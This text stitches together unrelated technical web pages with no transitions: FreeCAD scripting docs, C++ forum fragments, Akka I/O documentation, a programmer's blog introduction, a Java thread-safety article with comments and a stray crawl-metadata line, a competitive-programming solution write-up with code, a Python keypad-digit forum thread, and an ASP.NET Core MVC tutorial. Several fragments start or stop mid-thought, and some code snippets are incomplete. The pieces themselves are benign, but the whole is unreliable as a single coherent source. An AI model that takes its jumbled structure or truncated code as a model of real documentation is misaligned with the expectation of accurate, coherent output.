Scripting
See also: FreeCAD Scripting Basics.
The FHPlaneHole object can be used in macros and from the Python console by using the following function:
hole = makeFHPlaneHole(baseobj=None, X=0.0, Y=0.0, Z=0.0, holetype=None, length=None, width=None, radius=None, name='FHPlaneHole')
- Creates a FHPlaneHole object.
- baseobj: the Draft Point object whose position can be used as base for the FHPlaneHole. It has priority over X, Y, Z. If no baseobj is given, X, Y, Z are used as coordinates.
- X: x coordinate of the hole, in the absolute coordinate system.
- Y: y coordinate of the hole, in the absolute coordinate system.
- Z: z coordinate of the hole, in the absolute coordinate system.
- holetype: the type of hole. Allowed values are: "Point", "Rect", "Circle".
- length: the length of the hole (along the x dimension), in case of a rectangular "Rect" hole.
- width: the width of the hole (along the y dimension), in case of a rectangular "Rect" hole.
- radius: the radius of the hole, in case of a circular "Circle" hole.
- name: the name of the object.
The placement of the FHPlaneHole can be changed by modifying its Placement property, or by changing the X, Y, Z properties individually. Changing X, Y, Z modifies the hole position in the relative coordinate system of the Placement.
Additionally, the _FHPlaneHole class exposes these methods. The _FHPlaneHole class can be accessed through the FHPlaneHole object Proxy (e.g. fhhole.Proxy).
pos = getAbsCoord()
- Get a FreeCAD.Vector containing the hole coordinates in the absolute reference system.

pos = getRelCoord()
- Get a FreeCAD.Vector containing the hole coordinates relative to the FHPlaneHole Placement.

pos = setRelCoord(rel_coord, placement=None)
- Sets the hole position relative to the placement.
- rel_coord: a FreeCAD.Vector containing the hole coordinates relative to the FHPlaneHole Placement.
- placement: a new FHPlaneHole placement. If None, the placement is not changed.

pos = setAbsCoord(abs_coord, placement=None)
- Sets the absolute hole position, considering the object placement, and optionally forcing a new placement.
- abs_coord: a FreeCAD.Vector containing the hole coordinates in the absolute reference system.
- placement: a new FHPlaneHole placement. If None, the placement is not changed.
Example:
import FreeCAD, EM
fhhole = EM.makeFHPlaneHole(X=1.0, Y=1.0, Z=0.0, holetype="Rect", length=1.0, width=2.0)
Type: Posts; User: mary_um
Thank you! I figured it out!
int Counter::nCounters = 0;
Counter::Counter(int i)
{
counter = i;
Counter
{
int counter;
int counterID;
int nCounters;
Counter(int preset);
void increment();
void decrement();
int getValue();
int getCounterID();
Disregard! I figured it out!!
Maybe you can help me with one more thing. I have been messing with the code for a while and I did at one point get it to read the file and give me the output I needed, which is two names, from the...
Thank you for the help (and posting advice). I really appreciate it!
inputFile.open(fileName);
if (inputFile) {
while(getline(inputFile>> name))
cout<< name << endl;
This is where my issue is. The text did not turn red like I intended :/
#include <iostream>
#include <sstream>
#include <fstream>
#include <string>
using namespace std;
int main() {
ifstream inputFile;
string fileName, name, first, last, line;
I/O
Introduction
The akka.io package has been developed in collaboration between the Akka and spray.io teams. Its design combines experiences from the spray-io module with improvements that were jointly developed for more general consumption as an actor-based service.
The guiding design goal for this I/O implementation was to reach extreme scalability, make no compromises in providing an API correctly matching the underlying transport mechanism and to be fully event-driven, non-blocking and asynchronous. The API is meant to be a solid foundation for the implementation of network protocols and building higher abstractions; it is not meant to be a full-service high-level NIO wrapper for end users.
Terminology, Concepts
The I/O API is completely actor based, meaning that all operations are implemented with message passing instead of direct method calls. Every I/O driver (TCP, UDP) has a special actor, called a manager that serves as an entry point for the API. I/O is broken into several drivers. The manager for a particular driver is accessible through the IO entry point. For example the following code looks up the TCP manager and returns its ActorRef:
import akka.io.{ IO, Tcp } import context.system // implicitly used by IO(Tcp) val manager = IO(Tcp)
The manager receives I/O command messages and instantiates worker actors in response. The worker actors present themselves to the API user in the reply to the command that was sent. For example after a Connect command sent to the TCP manager the manager creates an actor representing the TCP connection. All operations related to the given TCP connections can be invoked by sending messages to the connection actor which announces itself by sending a Connected message.
DeathWatch and Resource Management
I/O worker actors receive commands and also send out events. They usually need a user-side counterpart actor listening for these events (such events could be inbound connections, incoming bytes or acknowledgements for writes). These worker actors watch their listener counterparts. If the listener stops then the worker will automatically release any resources that it holds. This design makes the API more robust against resource leaks.
Thanks to the completely actor based approach of the I/O API the opposite direction works as well: a user actor responsible for handling a connection can watch the connection actor to be notified if it unexpectedly terminates.
Write models (Ack, Nack)
I/O devices have a maximum throughput which limits the frequency and size of writes. When an application tries to push more data than a device can handle, the driver has to buffer bytes until the device is able to write them. With buffering it is possible to handle short bursts of intensive writes --- but no buffer is infinite. "Flow control" is needed to avoid overwhelming device buffers.
Akka supports two types of flow control:
- Ack-based, where the driver notifies the writer when writes have succeeded.
- Nack-based, where the driver notifies the writer when writes have failed.
Each of these models is available in both the TCP and the UDP implementations of Akka I/O.
Individual writes can be acknowledged by providing an ack object in the write message (Write in the case of TCP and Send for UDP). When the write is complete the worker will send the ack object to the writing actor. This can be used to implement ack-based flow control; sending new data only when old data has been acknowledged.
If a write (or any other command) fails, the driver notifies the actor that sent the command with a special message (CommandFailed in the case of UDP and TCP). This message will also notify the writer of a failed write, serving as a nack for that write. Please note, that in a nack-based flow-control setting the writer has to be prepared for the fact that the failed write might not be the most recent write it sent. For example, the failure notification for a write W1 might arrive after additional write commands W2 and W3 have been sent. If the writer wants to resend any nacked messages it may need to keep a buffer of pending messages.
Warning
An acknowledged write does not mean acknowledged delivery or storage; receiving an ack for a write simply signals that the I/O driver has successfully processed the write. The Ack/Nack protocol described here is a means of flow control not error handling. In other words, data may still be lost, even if every write is acknowledged.
ByteString
To maintain isolation, actors should communicate with immutable objects only. ByteString is an immutable container for bytes. It is used by Akka's I/O system as an efficient, immutable alternative the traditional byte containers used for I/O on the JVM, such as Array[Byte] and ByteBuffer.
ByteString is a rope-like data structure that is immutable and provides fast concatenation and slicing operations (perfect for I/O). When two ByteStrings are concatenated, both are kept inside the resulting ByteString rather than copied into a new array, which is what makes concatenation cheap. ByteString also comes with its own optimized builder and iterator classes ByteStringBuilder and ByteIterator which provide extra features in addition to those of normal builders and iterators.
Compatibility with java.io
A ByteStringBuilder can be wrapped in a java.io.OutputStream via the asOutputStream method. Likewise, ByteIterator can be wrapped in a java.io.InputStream via asInputStream. Using these, akka.io applications can integrate legacy code based on java.io streams.
Architecture in-depth
For further details on the design and internal architecture see I/O Layer Design.
Every programmer knows the first program one must write when learning a new language. But it was only when I was about 16 that I read the book "The C Programming Language", by Brian W. Kernighan and Dennis Ritchie, where the first program was in fact:
#include <stdio.h>
main()
{
    printf("hello, world\n");
}
But my adventure in programming began some years before.
I was about eleven years old and the ZX Spectrum was hype! I did not have one (yet!) but a school colleague did, so I borrowed the thing's manual from him. From there, I asked him to try some BASIC instructions that I wrote on a sheet of paper. The next day he would bring me the screen output on the same paper. After studying that at home, I would ask him for more tryouts… until he got fed up.
After a while I convinced my parents that the ZX Spectrum was the future and they would like me to be in the future, right? Games were ok, but not my thing. After maybe a year or two I had these two books: "The Complete Spectrum ROM Disassembly", by Dr. Ian Logan & Dr. Frank O'Hara, and "Z-80 Reference Guide", by Alan Tully, and Z-80 (the ZX Spectrum CPU) assembly was my game. In those years I also packed in some custom hardware projects, one for LED light shows and another for connecting a dot matrix printer to the ZX Spectrum using a Centronics parallel interface.
After the ZX Spectrum came the Philips MSX and the Commodore Amiga (this one supported the "hello, world" and my math and computer science degree), and then the IBM PC compatible ruled after the advent of Microsoft Windows 95. Somewhere in those early days I even used an Apple ][ for developing a project for a contract.
Programming in college went through C, C++, PASCAL, LISP ("Lots of Irritating and Stupid Parentheses": ah, those were the days!), PROLOG, ML, HyperTalk, SQLWindows and probably some others. After that, I ran into C# professionally and I've been an admirer ever since.
And now this blog sees the world. After getting inspired by Scott Hanselman's post "Your words are wasted", I decided to let it out. Besides, this blog will also serve to follow my efforts in open source software.
Defining thread safety is surprisingly tricky. A quick Google search turns up numerous “definitions” like these:
- Thread-safe code is code that will work even if many Threads are executing it simultaneously.
- A piece of code is thread-safe if it only manipulates shared data structures in a manner that guarantees safe execution by multiple threads at the same time.
And there are more similar definitions.
Don’t you think definitions like those above do not actually communicate anything meaningful, and even add some confusion? They cannot be dismissed outright, because they are not wrong; the fact is, though, that they provide no practical help or perspective. How do we distinguish a thread-safe class from an unsafe one? What do we even mean by “safe”?
What is Correctness in thread safety?
At the heart of any reasonable definition of thread safety is the concept of correctness. So, before understanding thread safety, we should first understand this “correctness”.
Correctness means that a class conforms to its specification.
You will agree that a good class specification describes the class’s possible states at any given time and the postconditions that hold after operations are performed on it.
Having optimistically defined “correctness” as something that can be recognized, we can now define thread safety in a somewhat less circular way: a class is thread-safe when it continues to behave correctly when accessed from multiple threads.
A class is thread-safe if it behaves correctly when accessed from multiple threads, regardless of the scheduling or interleaving of the execution of those threads by the runtime environment, and with no additional synchronization or other coordination on the part of the calling code.
If the loose use of “correctness” here bothers you, you may prefer to think of a thread-safe class as one that is no more broken in a concurrent environment than in a single-threaded environment. Thread-safe classes encapsulate any needed synchronization so that clients need not provide their own.
Example: A Stateless Servlet
A good example of a thread-safe class is a stateless Java servlet: it has no fields and no references to fields from other classes. It is stateless.
public class StatelessFactorizer implements Servlet {
    public void service(ServletRequest req, ServletResponse resp) {
        BigInteger i = extractFromRequest(req);
        BigInteger[] factors = factor(i);
        encodeIntoResponse(resp, factors);
    }
}
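By contrast, the moment a class like this acquires shared mutable state, its thread safety is lost unless access is coordinated. The sketch below is not from the article, and the class and field names are mine: a plain long counter whose increment is a non-atomic read-modify-write and can lose updates under contention, next to the standard fix with AtomicLong.

```java
import java.util.concurrent.atomic.AtomicLong;

public class CountingDemo {
    // Unsafe if shared: unsafeCount++ is read, add, write -- three steps
    // that another thread can interleave with, silently losing updates.
    static long unsafeCount = 0;

    // Safe: AtomicLong performs the read-modify-write as one atomic step.
    static final AtomicLong safeCount = new AtomicLong(0);

    public static void main(String[] args) throws InterruptedException {
        Thread[] workers = new Thread[4];
        for (int t = 0; t < workers.length; t++) {
            workers[t] = new Thread(() -> {
                for (int i = 0; i < 100000; i++) {
                    unsafeCount++;               // may lose updates
                    safeCount.incrementAndGet(); // never loses updates
                }
            });
            workers[t].start();
        }
        for (Thread w : workers) {
            w.join();
        }
        // safeCount is always exactly 400000; unsafeCount often falls short.
        System.out.println("atomic count: " + safeCount.get());
    }
}
```

A stateless class sidesteps this problem entirely, which is why the servlet above needs no synchronization at all.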
That’s all for this small but important concept around What is Thread Safety?
Happy Learning !!
Hi Lokesh,
This is an excellent website. Thanks a lot.
Please help me with one query: if my class is running and I don't want any thread to interrupt it, even from another JVM, then what should I do?
Will a class-level lock work from another JVM also?
Threads can access other threads only inside the same JVM.
Hi Lokesh,
I just wanted to say thank you.
Your blog and your explanations are helping us a lot. Thanks for sharing your knowledge.
Glad, it is of some use. Thanks for sharing your thoughts.
If a method's parameters are primitive, each thread can maintain these values on its own stack. But what about a method that has references to other objects as parameters: will each thread then also maintain the state of those objects on the thread stack? How does this work? Please explain.
The state of objects will always be on the heap, not the stack. If you have defined the objects within the method, then each thread will have its own copy of the objects, hence it is thread-safe.
Provided that the local objects are not exposed to the outside code. As objects are always created on the heap, they can be changed if a reference is available. | https://howtodoinjava.com/java/multi-threading/what-is-thread-safety/ | CC-MAIN-2020-05 | refinedweb | 617 | 64.41 |
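That point can be sketched as follows (my example, not from the comment thread): the list is created inside the method and never exposed before it is returned, so each call, and therefore each thread, works on its own heap object reachable only through a local reference.

```java
import java.util.ArrayList;
import java.util.List;

public class StackConfinement {
    // 'squares' is a fresh heap object per call; the only reference to it
    // lives on the calling thread's stack until it is returned.
    public static List<Integer> squaresUpTo(int n) {
        List<Integer> squares = new ArrayList<>();
        for (int i = 1; i <= n; i++) {
            squares.add(i * i);
        }
        return squares; // each caller receives its own independent list
    }

    public static void main(String[] args) {
        System.out.println(squaresUpTo(4)); // prints [1, 4, 9, 16]
    }
}
```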
I participated in this year's Facebook Hacker Cup and have enjoyed all the problems so far. The only problem I couldn't solve during the contest was the last problem of Round 2 named "Seafood" (link). Facebook always uploads solutions right after the contest, which I'm thankful for, so I checked the solution for that problem. However, I couldn't see why the solution works just from their description. Maybe I'm not thinking through it enough, but I found it hard to justify their approach in mathematical rigor. So I picked up key ideas from their description and filled out the details. I'm writing this for myself, and it turns out to be more complicated than I thought but I hope this helps some folks out there. If you have any simpler solution/description I'm happy to know.
Here is a short synopsis of the problem. You start at position $$$0$$$ of a number line and move around. There are clams and rocks on the number line. Each clam/rock has a distinct positive coordinate and its own strength, given as a number. When you are at a position where a clam is placed, you can take the clam immediately, and you can hold multiple clams at a time. When you are at a position where a rock is placed, you can use the rock to break open any clam you hold with lesser strength. Your goal is to open all the clams in the minimum distance moved (or determine that you can't). You should do this in quasilinear time over the number of clams plus rocks.
Some facts were evident. For example, there is no harm at picking clams as soon as we meet them. Also, we may assume that the rocks we use decrease in strength, because if we planned to use stronger rock later we can actually skip the weaker one and open the clams with stronger one later. However, this observation turned out to be a red herring as we don't use this assumption in the solution below.
If we move in the left direction on an optimum path, I thought it is because there is a rock we have to use even if we pay the cost of moving back and then forward without getting any clams. With this, one thing that recurred in my mind was that the optimum path should have a particular shape. For example, if this is one possible path
---------------> x<------- -------------> x<------- ----------------->
where 'x' denotes the stone we use, there seemed no reason to use two overlapping intervals and we can just use
--------------------> x<---x-------- ---------------------->
instead. With this, my idea was that the optimum path consists of such disjoint 'Z-shaped' overlapping intervals, ending with
-------------------->
or
--------------------> x<------------
But I couldn't justify any of them formally nor use these observations to find an effective algorithm. In particular, how can we determine where the path ends and how far the path extends? At that time I felt damn sleepy (after 3 hours of contest it was 5AM here) and gave up. Fortunately I finished at around 160-ish and got the T-shirt and so on.
The optimum path should turn its direction or end where either a clam or rock is, or we waste some distance in the middle. Call any interval with endpoints at 0/clam/rocks with no clams nor rocks inside a simple interval. An optimal path will consist of sequence of simple intervals with directions. We will use this observation later.
The optimum path should extend to at least the rightmost clam $$$c_r$$$ because we have to pick it. As soon as we pick $$$c_r$$$, we have collected all the clams so the only thing left to do is to find the rock that opens all the collected yet unopened clams. Therefore, the optimum path will (i) visit $$$c_r$$$ and (ii) move the shortest distance to a rock $$$e$$$ that opens all remaining clams and end. The first key is to assume that we know $$$e$$$ a priori. This takes a bit of courage, but it will completely determine the optimum path and enable us to compute the optimum path effectively. Say the rightmost position we visit is $$$r$$$. We have $$$r = \max(c_r, e)$$$.
The second key is to distinguish between clams that are 'naturally' opened during the journey and clams that need to be carried back(left) to open. Fix arbitrary clam $$$c$$$. (a) If there is a stronger rock $$$r_c$$$ in between $$$c$$$ and $$$r$$$ (inclusive) we will eventually hit $$$r_c$$$ after picking $$$c$$$ by mean value theorem so there is no need to worry about $$$c$$$. (b) Otherwise, we should reach $$$c$$$ to pick and then move to left to find any stronger rock (if exists).
Discard clams of case (a) and for any clam $$$c$$$ of case (b), let's compute the rightmost rock $$$r_c$$$ that is stronger than $$$c$$$, which should be on the left side of $$$c$$$. Then an optimal path sweep through any simple interval inside $$$I_c = [r_c, c]$$$ from right to left at some moment to carry $$$c$$$ to $$$r_c$$$. Take union over such $$$I_c$$$'s and call the union $$$S$$$. Then we see that a simple interval in $$$S \cap [0, e]$$$ has to be swept at least three times (right, then left because the interval is in $$$S$$$, then right to finish at $$$e$$$). All the other simple intervals in $$$[0, e]$$$ has to be swept at least one time (from left to right) and intervals in $$$[e, r]$$$ at least two times (to visit $$$r$$$ and finish at $$$e$$$). This gives an lower bound on the path length; for each simple interval in between $$$[0, r]$$$, multiply its length with its multiplicity and sum over.
Is the lower bound attainable? Yes: Say $$$S = \cup_i [a_i, b_i]$$$ where $$$[a_i, b_i]$$$ are disjoint maximal intervals inside $$$S$$$, ordered so that $$$a_1 < b_1 < a_2 < b_2 < \cdots$$$. Start moving from 0 to right. For each interval $$$[a_i, b_i]$$$ with $$$b_i \leq e$$$, go to $$$b_i$$$ then move back to $$$a_i$$$ and then move in right direction again. Do this in the increasing order of $$$i$$$. After all such intervals are processed, keep moving until we hit $$$r$$$. From $$$r$$$, if the unique interval $$$[a_i, b_i]$$$ such that $$$a_i < e < b_i$$$ exists, move to $$$a_i$$$ and then $$$e$$$. Otherwise, move from $$$r$$$ to $$$e$$$ directly. By definition this path attains the multiplicity bound described in previous paragraph. Also, this path sweeps each $$$[a_i, b_i]$$$ from right to left at some point, so all clams $$$c$$$ are carried to $$$r_c$$$ as $$$[r_c, c] \subseteq [a_i, b_i]$$$ for some $$$i$$$. Therefore, we have found the optimum path assuming the value of $$$e$$$.
It only remains to compute $$$S$$$ (the multiplicity of each simple interval) effectively as we change over $$$e$$$. Iterate $$$e$$$ over all rocks from right to left. As $$$e$$$ moves from right to left, intervals of form $$$[r_c, c]$$$ only adds up, so as one interval $$$I = [r_c, c]$$$ forms we can just update $$$S$$$ by $$$S := S \cup I$$$. This can be done effectively by various means (maintain $$$S$$$ or its complement as
std::set, union-find, etc). For each update, observe the simple intervals added to $$$S$$$ and update the length of optimum path. As each simple interval adds to $$$S$$$ at most once, the total time taken is the number of simple interval times multiplied by time taken for adding an interval to $$$S$$$. This makes the total time quasilinear over the number of clams/rocks (I'm being sketchy here. Please let me know if you want the details).
#include <iostream>
#include <algorithm>
#include <cstdio>
#include <vector>
#include <set>
#include <string>
#include <cassert> // added: assert() is used below

using namespace std;

long long solve(int n, vector<int> p, vector<int> h, const string &s);

int main() {
    int T;
    scanf("%d", &T);
    for (int t = 1; t <= T; t++) {
        int n;
        scanf("%d", &n);
        long long a, b, c, d;
        vector<int> p(n);
        scanf("%d %d %lld %lld %lld %lld", &p[0], &p[1], &a, &b, &c, &d);
        for (int i = 2; i < n; i++) p[i] = ((a * p[i - 2] + b * p[i - 1] + c) % d) + 1;
        vector<int> h(n);
        scanf("%d %d %lld %lld %lld %lld", &h[0], &h[1], &a, &b, &c, &d);
        for (int i = 2; i < n; i++) h[i] = ((a * h[i - 2] + b * h[i - 1] + c) % d) + 1;
        string s;
        cin >> s;
        printf("Case #%d: %lld\n", t, solve(n, p, h, s));
    }
    return 0;
}

struct thing {
    int p, h;
    char t;
    int data;
    thing() {}
    thing(int p, int h, char t) : p(p), h(h), t(t) {}
};

const int tmax = 1048575;
const int inf = 1000000000;

struct FenwickTree {
    int tree[tmax + 1];
    void clear() {
        for (int i = 1; i <= tmax; i++) tree[i] = -inf;
    }
    FenwickTree() { clear(); }
    void upd(int i, int val) {
        i++;
        while (i <= tmax) {
            tree[i] = max(tree[i], val);
            i += (i & -i);
        }
    }
    int calc(int i) {
        i++;
        if (i <= 0) return -inf;
        assert(1 <= i && i <= tmax);
        int res = tree[i];
        while (i > 0) {
            res = max(res, tree[i]);
            i -= (i & -i);
        }
        return res;
    }
};

struct IntervalUnion {
    set<int> complement;
    vector<int> weights;
    long long weight = 0LL;
    IntervalUnion(vector<int> w) : weights(w) {
        for (int i = 0; i <= tmax; i++) complement.insert(i);
    }
    void add(int i, int j) {
        auto l = complement.lower_bound(i);
        auto u = complement.lower_bound(j);
        for (auto it = l; it != u; it++) {
            weight += weights[*it];
        }
        complement.erase(l, u);
    }
    bool subtract(int i) {
        if (complement.count(i) == 0) {
            complement.insert(i);
            weight -= weights[i];
            return true;
        } else {
            return false;
        }
    }
};

vector<int> pivots[tmax];

long long solve(int n, vector<int> p, vector<int> h, const string &s) {
    vector<thing> things(n);
    for (int i = 0; i < n; i++) things[i] = thing(p[i], h[i], s[i]);
    sort(things.begin(), things.end(),
         [](const thing &t1, const thing &t2) { return t1.p < t2.p; });
    sort(h.begin(), h.end());
    h.resize(unique(h.begin(), h.end()) - h.begin());
    for (auto &t : things) {
        t.h = lower_bound(h.begin(), h.end(), t.h) - h.begin();
        t.h = int(h.size()) - 1 - t.h;
    }
    FenwickTree ft;
    for (int i = 0; i < n; i++) {
        if (things[i].t == 'R') {
            ft.upd(things[i].h, i);
        } else {
            things[i].data = ft.calc(things[i].h - 1);
        }
    }
    vector<int> weights(n);
    for (int i = 0; i < n; i++) weights[i] = things[i].p - (i == 0 ? 0 : things[i - 1].p);
    IntervalUnion iu(weights);
    ft.clear();
    for (int i = 0; i <= tmax; i++) pivots[i].clear();
    for (int i = n - 1; i >= 0; i--) {
        if (things[i].t == 'R') {
            ft.upd(things[i].h, -i);
        } else {
            int cc = ft.calc(things[i].h - 1);
            if (cc == -inf) {
                // no rock forward to handle this clam
                if (things[i].data < 0) return -1;
                else {
                    iu.add(things[i].data + 1, i + 1);
                }
            } else {
                assert(-cc >= 0 && -cc < n);
                pivots[-cc].push_back(i);
            }
        }
    }
    long long ans = 1000000000000000000LL;
    long long cans;
    bool met_clam = false;
    long long clam_pos = -1LL;
    for (int i = n - 1; i >= 0; i--) {
        if (things[i].t == 'R') {
            if (!met_clam) {
                cans = things[i].p + 2LL * iu.weight;
            } else { // met_clam
                cans = 2LL * clam_pos - things[i].p + 2LL * iu.weight;
            }
            ans = min(ans, cans);
        } else if (!met_clam) {
            met_clam = true;
            clam_pos = things[i].p;
        }
        if (things[i].t == 'R' && !met_clam) {
            for (auto clamback : pivots[i]) {
                iu.add(things[clamback].data + 1, clamback + 1);
            }
        }
        iu.subtract(i);
    }
    return ans;
}
Seb
Sounds great! Looking forward to it.
Seb
Thank you both for your help. I am going to do some lessons on using return in functions as I’ve realised I don’t fully understand it.
7upser, I didn’t realise you could iterate without it being in a list, so I have removed that, and also simplified it so there aren’t two functions directly after each other changing the same variable. Is that something that’s just ‘best practice’? (Although this is just a fledgling hobby at the moment, I don’t want to pick up bad habits.)
Mikael that is a frustratingly short solution! I have a lot to learn. Thanks for your help.
Here is the code now that it works :) I just need to convert to letters, which I’ll look at shortly.
keys = '12233333333337777777777'
sameletter = True

def splitter(keys):
    global sameletter
    split_letters = []
    buffer = []
    previousdigit = ''
    for digit in keys:
        if digit in {previousdigit, "''"}:
            check_buffer_len(buffer, previousdigit)
        else:
            sameletter = False
        if sameletter == True:
            buffer.append(digit)
            previousdigit = digit
        else:
            split_letters.append(buffer)
            buffer = []
            buffer.append(digit)
            previousdigit = digit
    split_letters.append(buffer)
    print(split_letters)

def check_buffer_len(buffer, previousdigit):
    global sameletter
    if len(buffer) < 3:
        sameletter = True
        return
    if len(buffer) < 4 and previousdigit in {'7','9'}:
        sameletter = True
    else:
        sameletter = False
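For the letter-conversion step mentioned above, something like this could work (a sketch, not part of the thread’s code; it assumes a standard phone keypad layout where n presses of a key select that key’s n-th letter):

```python
# Hypothetical follow-up step: turn each completed group of presses into a
# letter, assuming the standard keypad layout ('2' -> abc ... '9' -> wxyz).
KEYPAD = {
    '2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl',
    '6': 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz',
}

def groups_to_letters(groups):
    letters = []
    for group in groups:
        key = group[0]
        if key in KEYPAD:
            # len(group) presses select the (len(group) - 1)-th letter
            letters.append(KEYPAD[key][len(group) - 1])
    return ''.join(letters)

print(groups_to_letters(['44', '33', '555', '555', '666']))  # hello
```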
Seb
but i get
NameError: name 'split_letters' is not defined
Thanks, have edited it now. Do you still get ‘split_letters’ is not defined? The code runs for me but I just get a blank output ‘[ ]’
Seb
@Seb, please surround your code with three back ticks (```) to make it readable.
Meanwhile, of course, there already is a function for the grouping. The following gives you a list of tuples, where the first item is the key pressed, and the second is how many times it was pressed.
import itertools

digits = [
    (key, len(list(grouper)))
    for key, grouper in itertools.groupby('4433555555666')
]
print(digits)
Thanks! now edited.
groupby is interesting, thanks for that suggestion. My original reasoning for splitting the digits up though, is if the string has ‘333333’ it would end up being ‘333’, ‘333’ and translate to ‘f’,’f’ eventually. However if it was ‘777777’ you can press 7 four times not three, so the grouping would end up ‘7777’, ‘77’.
I am trying to find an elegant solution to splitting the numbers either when they change or when they’ve reached the repeat limit (and cycle to the next letter)
If i run the groupby solution I would end up with (‘3’, 6), (‘7’, 6) which could be useful but would then still need splitting again, if you see what I mean?
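Building on the groupby suggestion, that extra split at each key’s press limit could be handled like this (my sketch, not from the thread; it assumes a limit of four presses for ‘7’ and ‘9’ and three for the other keys, as discussed above):

```python
# Group repeated key presses, then split each run at that key's press limit.
import itertools

def split_presses(keys):
    groups = []
    for key, grouper in itertools.groupby(keys):
        run = len(list(grouper))
        limit = 4 if key in '79' else 3  # '7' and '9' carry four letters
        while run > 0:
            take = min(run, limit)
            groups.append(key * take)
            run -= take
    return groups

print(split_presses('12233333333337777777777'))
# ['1', '22', '333', '333', '333', '3', '7777', '7777', '77']
```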
Seb
Hi, I am pretty new to coding in general and have been following lots of tutorials to try and learn Python. I am attempting a question from one of the tutorials: translating digits to letters. The way I thought of it initially was to split all the digits into their corresponding groups before translating them. So the string ‘1223333’ would end up being ‘1’, ‘22’, ‘333’, ‘3’. I am aiming to check each digit in the string, see if it is the same as the previous digit, and if not, move the buffered digits into the final list and add the new digit into the buffer, to correctly split the numbers into their groups.
Here is what I have so far, but I can’t seem to get the True/ False variables to change, so everything ends up in the buffer + final string!
keys = '1223333'
keylist = list(keys)
global sameletter
sameletter = True

def splitter(keylist):
    split_letters = []
    buffer = []
    previousdigit = ''
    for digit in keylist:
        check_previous(digit, previousdigit)
        check_buffer_len(buffer, previousdigit)
        if sameletter == True:
            buffer.append(digit)
            previousdigit = digit
        else:
            split_letters.append(buffer)
            buffer.clear
            buffer.append(digit)
            previousdigit = digit
    print(split_letters)

def check_previous(digit, previousdigit):
    if digit != previousdigit:
        sameletter = False

def check_buffer_len(buffer, previousdigit):
    if len(buffer) == 3:
        if previousdigit in {'7','9'}:
            sameletter = True
        else:
            sameletter = False

splitter(keys)
I think the problem, looking through it with the debugger, is that the sameletter variable never actually changes to False. Would anybody be able to help?
Thanks!
Seb
Just wanted to say as a complete beginner this is really helpful! I look forward to the next episode :) | https://forum.omz-software.com/user/seb | CC-MAIN-2021-17 | refinedweb | 694 | 62.58 |
12 July 2012 17:09 [Source: ICIS news]
LONDON (ICIS)--PSA Peugeot Citroen’s plans to close an assembly plant in France will have a serious impact on chemical companies that supply plastics, rubber and glass parts to car manufacturers, sources said on Thursday.
French carmaker PSA announced it would cut 8,000 jobs and close one of its assembly plants at Aulnay.
A PSA spokesperson said: "The project presented today is that production will stop at our Aulnay site with manufacturing being then centred at our Poissy plant [near
“At the moment we are burning €200m cash a month so now we would like to stop it and get back to breakeven levels by the end of 2014, as we do not believe market fundamentals will change," PSA's spokesman said.
"We are being realistic in our approach, although we do not deny the market will remain tough," he added.
One PC buyer said: “I expect [other] car makers will shut down for prolonged maintenances around Christmas because the market is oversupplied and output will have to be reduced.”
Most sources agreed that the fundamental problem is that demand has declined far more in 2012 than anybody had anticipated. Coupled with high feedstock costs, suppliers to the automotive industry are now struggling, which will also have a negative impact on upstream markets.
To drive sales up, car manufacturers in
Italian car-maker Fiat's latest initiative offered consumers €1/litre petrol for three years if they bought a new car in June or July in
"I think it shows how desperate Fiat is to increase sales and it remains to be seen how effective this strategy is," a PC buyer said.
New car registrations are expected to decrease by about 7% in 2012 compared with 2011. Sales are expected to drop from 13.1m last year to 12.2m this year, according to data from the European Automobile Manufacturers' Association (ACEA).
It is estimated that about 4-7kg of PC is used in each car for headlamps, switches, rooftops and other parts, a PC-part supplier said.
"The outlook for the European vehicle market in 2012 has further worsened due to the challenging economic situation in many of the EU member states. Though not all manufacturers are affected to the same extent, vehicle production in
The industry has proven to be extremely resilient in recent years, but optimising competitiveness is key in an increasingly globalised world, McLaughlin added.
It is not all doom and gloom. Most car manufacturers expect growth in emerging markets, such as
"It is clear that growth in the next ten years will be outside of Europe, in emerging markets such as
However, with falling car sales and dwindling consumer confidence it is clear the automotive industry, and its suppliers, are in for a rough ride in coming years.
According to industry sources, replacement car and small vehicle tyre sales have dropped by 10-15%, while truck tyre sales are down by 30-40% in May compared with the same period last year, depending on region of
Flat glass manufacturers are also facing an uphill battle. Although most of their demand comes from the construction industry, a dip in sales from the automotive sector can have a negative influence on their earnings.
Coating and paint demand has also declined significantly since last year, mainly driven by falling sales to the automotive and construction sectors. Producers and buyers of epoxy resins and titanium dioxide, main ingredients for paints and coatings used to protect the body of a car, have said demand for their products has fallen by about 15-20% so far this year.
As a result of slowing downstream demand, chemical output is certain to fall. And with budget cuts and massive deficits, it is near certain that governments will be unable to step in to help ailing industries.
"Considering that most manufacturers are losing money | http://www.icis.com/Articles/2012/07/12/9577968/PSAs-plant-closure-to-have-negative-impact-on-chems.html | CC-MAIN-2014-52 | refinedweb | 652 | 53.04 |
Back to: ASP.NET Core Tutorials For Beginners and Professionals
Introduction to ASP.NET Core MVC Framework
In this article, I am going to give you a brief introduction to ASP.NET Core MVC Framework. Please read our previous article where we discussed Developer Exception Page Middleware Components in ASP.NET Core Application. As part of this article, we are going to discuss the following pointers.
- What is MVC?
- How MVC Design Pattern Works?
- Understanding Model, View, and Controller.
- Where the MVC Design Pattern is used in the real-time three-layer application?
- What is ASP.NET Core MVC?
What is MVC?
MVC stands for Model View and Controller. It is an architectural design pattern that means this design pattern is used at the architecture level of an application. So, the point that you need to remember is MVC is not a programming language, MVC is not a Framework, it is a design pattern. When we design an application, first we create the architecture of that application, and MVC plays an important role in the architecture of that particular application.
The MVC Design Pattern is basically used to develop interactive applications; an interactive application is one where user interaction is involved and, based on that interaction, some event handling occurs. The most important point to remember is that it is not only used for developing web-based applications: we can also use the MVC design pattern to develop desktop or mobile-based applications.
The MVC (Model-View-Controller) design pattern was introduced in the 1970s. It divides an application into three major components: Model, View, and Controller. The main objective of the MVC design pattern is the separation of concerns, meaning the domain model and business logic are separated from the user interface (i.e. the view). As a result, maintaining and testing the application becomes simpler and easier.
How does MVC Design Pattern work in ASP.NET Core?
Let us see an example to understand how the MVC pattern works in the ASP.NET Core MVC application. For example, we want to design an application, where we need to display the student details on a web page as shown below.
So, when we issue a request for the student details from a web browser, the following things happen, in order, to handle the request.
The controller is the component in the MVC design pattern that actually handles the incoming request. In order to handle the request, the controller does several things, as follows. The controller creates the model that is required by a view. The model is the component in the MVC design pattern that contains the classes used to store the domain data, or you can say business data.
